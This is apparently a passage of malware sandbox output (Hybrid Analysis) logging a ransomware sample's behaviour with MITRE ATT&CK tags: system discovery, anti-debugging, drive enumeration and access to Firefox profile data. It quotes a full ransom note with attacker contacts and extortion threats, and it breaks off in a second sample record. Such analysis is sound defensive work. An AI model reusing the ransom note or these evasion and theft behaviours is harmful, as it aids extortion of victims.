\"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000630061006300640034003200310037003300660035003700300033006600320064003600370039003900610033003500650061003600330034003600340033003800650066003000350035003400370036006300660066003700660062003300660031002e00650078006500000000000000000000000000000000000000000000000000000000000000ff2bf87625d91c77d8eb5276ac0117000000170000000000000000001c00700002000000000000000000000000000000000000001d006b00020000000000000000000000606f170000000000200000000000000000000000 (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000036006300660066003700660062003300660031002e006500780065000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ff2bf87671d91c77020000000c02a2000000a20038004600010000000000000000000000000000000000000039003500010000000000000000000000000000000000000058037d0000000000 (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000009f6a76e064ed130070f21300fcffdc7200000000ca92dc7200f6dc72b56edb72eb6a76e002000000fcdddd7248d8dd720000000000000000000000000000000000000000000000000000000030dddd7200000000403cdb7200000000dc33db7228d8dd720000000000000000000000000000000000000000eb6a76e050f513005900dd72 (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000f8760dd91c7702000000a401a2000000a2005001a20003000000548ca2005001a20000001700000000001d006b005d00000000d91c775001a200ac01170038d87e00200000006100000016008e0004000000506c1700706d170070491b00187117000000000061000061c400a200f60200f4606f1700bd31f701000000008000000000000000f60200f438d87e000000000028f513006870a200b8f4130080f4ce760000a2000000000089f4ce76b11eb0e0020000002cf5130028f513002cdedd72f0f5130095e1f476853ff701feffffff7cf41300c83ad876f0f41300d58cd076 (UID: 00000000-00006044)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-148", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve account information for specified SID", "description": "\"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"LookupAccountSidW\" with param Name %OSUSER% (UID: 00000000-00006044)", "origin": "API Call", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-146", "type": 6, "relevance": 3, "name": "Calls an API typically used to determine if process is running under WOW64", "description": "\"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"IsWow64Process\" with parameter \"6044\" - (UID: 00000000-00006044)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-1", "type": 3, "relevance": 5, "name": "Reads the cryptographic machine GUID", "description": "\"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\CRYPTOGRAPHY\"; Key: \"MACHINEGUID\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-35", "type": 3, "relevance": 5, "name": "Reads the active computer name", "description": "\"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-102", "type": 6, "relevance": 5, "name": "Calls an API typically used for searching a directory for files", "description": "\"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\System32\\*.dll (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"FindNextFileW\" with parameter accessibilitycpl.dll (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"FindNextFileW\" with parameter ACCTRES.dll (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"FindNextFileW\" with parameter acledit.dll (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"FindNextFileW\" with parameter aclui.dll (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"FindNextFileW\" with parameter acmigration.dll (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"FindNextFileW\" with parameter acppage.dll (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"FindNextFileW\" with parameter acproxy.dll (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"FindNextFileW\" with parameter ActionCenter.dll (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"FindNextFileW\" with parameter ActionCenterCPL.dll (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"FindNextFileW\" with parameter ActionQueue.dll (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"FindNextFileW\" with parameter activeds.dll (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"FindNextFileW\" with parameter actxprxy.dll (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"FindNextFileW\" with parameter AdmTmpl.dll (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"FindNextFileW\" with parameter adprovider.dll (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"FindNextFileW\" with parameter adsldp.dll (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"FindNextFileW\" with parameter adsldpc.dll (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"FindNextFileW\" with parameter adsmsext.dll (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"FindNextFileW\" with parameter adsnt.dll (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"FindNextFileW\" with parameter adtschema.dll (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"FindNextFileW\" with parameter advapi32.dll (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"FindNextFileW\" with parameter advpack.dll (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"FindNextFileW\" with parameter aecache.dll (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"FindNextFileW\" with parameter aeevts.dll (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"FindNextFileW\" with parameter aeinv.dll (UID: 00000000-00006044)", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-108", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve information about the current system", "description": "\"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-103", "type": 6, "relevance": 3, "name": "Calls an API typically used for taking snapshot of the specified processes", "description": "\"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "api-219", "type": 6, "relevance": 3, "name": "Calls an API typically used to register an interface (RPC)", "description": "\"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"RpcServerRegisterIf2\" (UID: 00000000-00006044)", "origin": "API Call", "attck_id": "T1021", "attck_id_wiki": "https://attack.mitre.org/techniques/T1021"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "binary-71", "type": 8, "relevance": 1, "name": "Sample file has high entropy (likely encrypted/compressed content)", "description": "Sample file \"sample.bin\" has high entropy 7.217767905357348", "origin": "Binary File", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "api-37", "type": 6, "relevance": 10, "name": "Opens the Kernel Security Device Driver (KsecDD) of Windows", "description": "\"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" opened \"\\Device\\KsecDD\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-173", "type": 3, "relevance": 1, "name": "Queries services related registry keys", "description": "\"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LANMANWORKSTATION\\PARAMETERS\"; Key: \"RPCCACHETIMEOUT\"; Value: \"\")\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"LDAPCLIENTINTEGRITY\"; Value: \"\")\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"USEOLDHOSTRESOLUTIONORDER\"; Value: \"\")\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"USEHOSTNAMEASALIAS\"; Value: \"\")\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"IPV4LOOPBACKALTERNATIVE\"; Value: \"\")\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\NETLOGON\\PARAMETERS\"; Key: \"EXPECTEDDIALUPDELAY\"; Value: \"\")\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\"; Key: \"HOSTNAME\"; Value: \"\")\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\"; Key: \"DOMAIN\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Detection/Stealthyness", "identifier": "api-9", "type": 6, "relevance": 4, "name": "Queries process information", "description": "\"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" queried SystemProcessInformation at 00000000-00006044-00000105-3684301 [PID: 6044]\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" queried SystemProcessInformation at 00000000-00006044-00000105-3684628 [PID: 6044]\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" queried SystemProcessInformation at 00000000-00006044-00000105-4619689 [PID: 6044]\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" queried SystemProcessInformation at 00000000-00006044-00000105-4619997 [PID: 6044]\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" queried SystemProcessInformation at 00000000-00006044-00000105-4785752 [PID: 6044]\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" queried SystemProcessInformation at 00000000-00006044-00000105-4786021 [PID: 6044]\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" queried SystemProcessInformation at 00000000-00006044-00000105-5243433 [PID: 6044]\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" queried SystemProcessInformation at 00000000-00006044-00000105-5243716 [PID: 6044]\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" queried SystemProcessInformation at 00000000-00006044-00000105-5557222 [PID: 6044]\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" queried SystemProcessInformation at 00000000-00006044-00000105-5557511 [PID: 6044]\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" queried SystemProcessInformation at 00000000-00006044-00000105-5985141 [PID: 6044]\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" queried SystemProcessInformation at 00000000-00006044-00000105-5985771 [PID: 6044]\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" queried SystemProcessInformation at 00000000-00006044-00000105-6194041 [PID: 6044]\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" queried SystemProcessInformation at 00000000-00006044-00000105-6194530 [PID: 6044]\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" queried SystemProcessInformation at 00000000-00006044-00000105-6396623 [PID: 6044]\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" queried SystemProcessInformation at 00000000-00006044-00000105-6397110 [PID: 6044]\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" queried SystemProcessInformation at 00000000-00006044-00000105-6598932 [PID: 6044]\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" queried SystemProcessInformation at 00000000-00006044-00000105-6599195 [PID: 6044]\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" queried SystemProcessInformation at 00000000-00006044-00000105-6910536 [PID: 6044]\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" queried SystemProcessInformation at 00000000-00006044-00000105-6910851 [PID: 6044]\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" queried SystemProcessInformation at 00000000-00006044-00000105-7164522 [PID: 6044]\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" queried SystemProcessInformation at 00000000-00006044-00000105-7164783 [PID: 6044]\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" queried SystemProcessInformation at 00000000-00006044-00000105-7362430 [PID: 6044]\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" queried SystemProcessInformation at 00000000-00006044-00000105-7362709 [PID: 6044]\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" queried SystemProcessInformation at 00000000-00006044-00000105-7674075 [PID: 6044]", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "api-84", "type": 6, "relevance": 10, "name": "Sets the 'ThreadHideFromDebugger' thread data structure", "description": "\"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" is setting 'ThreadHideFromDebugger' data for thread ID 0xfffffffe\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" is setting 'ThreadHideFromDebugger' data for thread ID 0x1d8", "origin": "API Call", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 1, "name": "Section contains high entropy", "description": "\"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1\" has section name .text with entropy \"6.63407926691\"\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1\" has section name .data with entropy \"7.98697903747\"\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1\" has section name .pdata with entropy \"7.76837094573\"\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1\" has section name .reloc with entropy \"6.73898724688\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Spyware/Information Retrieval", "identifier": "api-170", "type": 6, "relevance": 5, "name": "Calls an API typically used to retrieve the current status of the specified service", "description": "\"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"QueryServiceStatusEx\" with parameters {\"hService\": \"1be7c0\"\n \"InfoLevel\": \"0\"\n \"lpBuffer\": \"1310136\"\n \"cbBufSize\": \"36\"\n \"pcbBytesNeeded\": \"0\"}\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"QueryServiceStatusEx\" with parameters {\"hService\": \"1be810\"\n \"InfoLevel\": \"0\"\n \"lpBuffer\": \"1310136\"\n \"cbBufSize\": \"36\"\n \"pcbBytesNeeded\": \"0\"}", "origin": "API Call", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Spyware/Information Retrieval", "identifier": "api-109", "type": 6, "relevance": 10, "name": "Calls an API typically used to determine the valid logical drives on the computer", "description": "\"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"GetLogicalDriveStringsW\" with parameters {\"nBufferLength\": \"0\"}\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"GetLogicalDriveStringsW\" with parameters {\"nBufferLength\": \"260\"\n \"lpBuffer\": \"C:\\\\\"}\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"GetLogicalDriveStringsW\" with parameters {\"nBufferLength\": \"9\"\n \"lpBuffer\": \"C:\\\\\"}", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Ransomware/Banking", "identifier": "string-13", "type": 2, "relevance": 5, "name": "Detected indicator that file is ransomware", "description": "\"YOUR FILES ARE ENCRYPTEDYour files, documents, photos, databases and other important files are encrypted.You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique decryptor.Only we can give you this decryptor and only we can recover your files.To be sure we have the decryptor and it works you can send an email: vortexecho@zohomail.eu and decrypt one file for free.But this file should be of not valuable!Your personal DECRYPTION ID: 57EF078892B7D9E21F4C4AC916A0748BDo you really want to restore your files?Write to email: vortexecho@zohomail.euReserved email: somran@cyberfear.comtelegram: @somran2025Attention! * Do not rename or edit encrypted files and archives containing encrypted files. * Do not try to decrypt your data using third party software, it may cause permanent data loss. * Decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. * We have been in your network for a long time. We know everything about your company most of your information has already been downloaded to our server. We recommend you to do not waste your time if you dont wont we start 2nd part. * You have 24 hours to contact us. * Otherwise, your data will be sold or made public.\" (Source: cbNhUvy60.README.txt, Indicator: \"files are encrypted\")\n \"Your files, documents, photos, databases and other important files are encrypted.\" (Source: 00000000-00006044.00000001.68086.001BE000.00000004.mdmp, 00000000-00006044.00000002.70006.00170000.00000004.mdmp, Indicator: \"files are encrypted\")\n \"YOUR FILES ARE ENCRYPTED\" (Source: 00000000-00006044.00000002.70006.00170000.00000004.mdmp, Indicator: \"files are encrypted\")", "origin": "File/Memory", "attck_id": "T1491.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1491/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Ransomware/Banking", "identifier": "binary-10", "type": 8, "relevance": 5, "name": "The input sample dropped very many files", "description": "The input sample dropped 791 files (often an indicator for ransomware)", "origin": "Binary File", "attck_id": "T1491.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1491/001"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Spyware/Information Retrieval", "identifier": "api-96", "type": 6, "relevance": 10, "name": "Tries to steal browser sensitive information (file access)", "description": "\"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" trying to open a file \"\\Device\\HarddiskVolume2\\Users\\%OSUSER%\\AppData\\Roaming\\Mozilla\\Firefox\\\"\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" trying to open a file \"\\Device\\HarddiskVolume2\\Users\\%OSUSER%\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\g4h7miqt.default\\\"\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" trying to open a file \"\\Device\\HarddiskVolume2\\Users\\%OSUSER%\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\g4h7miqt.default\\storage\\temporary\\https+++www.google.com^privateBrowsingId=1\\\"\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" trying to open a file \"\\Device\\HarddiskVolume2\\Users\\%OSUSER%\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\g4h7miqt.default\\storage\\permanent\\chrome\\\"\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" trying to open a file \"\\Device\\HarddiskVolume2\\Users\\%OSUSER%\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\g4h7miqt.default\\storage\\permanent\\chrome\\idb\\\"\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" trying to open a file \"\\Device\\HarddiskVolume2\\Users\\%OSUSER%\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\g4h7miqt.default\\sessionstore-backups\\\"\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" trying to open a file \"\\Device\\HarddiskVolume2\\Users\\%OSUSER%\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\g4h7miqt.default\\gmp-widevinecdm\\1.4.8.1008\\\"\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" trying to open a file \"\\Device\\HarddiskVolume2\\Users\\%OSUSER%\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\g4h7miqt.default\\gmp-gmpopenh264\\1.7.1\\\"\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" trying to open a file \"\\Device\\HarddiskVolume2\\Users\\%OSUSER%\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\g4h7miqt.default\\datareporting\\\"\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" trying to open a file \"\\Device\\HarddiskVolume2\\Users\\%OSUSER%\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\g4h7miqt.default\\datareporting\\archived\\2023-08\\\"\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" trying to open a file \"\\Device\\HarddiskVolume2\\Users\\%OSUSER%\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\g4h7miqt.default\\crashes\\\"", "origin": "API Call", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448
https://hybrid-analysis.com/sample/a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448
Hybrid Analysis - Ransomware
{"size": 605960, "type": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows", "submit_name": "a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448", "sha256": "a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448", "av_detect": 87, "vx_family": "Zusy.Generic", "threat_score": 85, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_processes": 3, "total_signatures": 141, "extracted_files": [{"name": "085cda53603755dc.exe", "file_path": "%TEMP%\\085cda53603755dc.exe", "file_size": 605964, "sha256": "a0c96c1530c5ab5f22644d43278ee7bc60cc50f0b4091aee9988e5d943e4b9fa", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows", "runtime_process": "a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448.exe (PID: 5880)", "threat_level_readable": "no specific threat", "file_available_to_download": true}], "processes": [{"uid": "00000000-00005880", "name": "a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448.exe", "normalized_path": "C:\\a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448.exe", "sha256": "a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448"}, {"uid": "00000000-00005760", "parentuid": "00000000-00005880", "name": "085cda53603755dc.exe", "normalized_path": "%TEMP%\\085cda53603755dc.exe", "command_line": ":*C:\\a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448.exe *", "sha256": "a0c96c1530c5ab5f22644d43278ee7bc60cc50f0b4091aee9988e5d943e4b9fa"}, {"uid": "00000000-00005860", "parentuid": 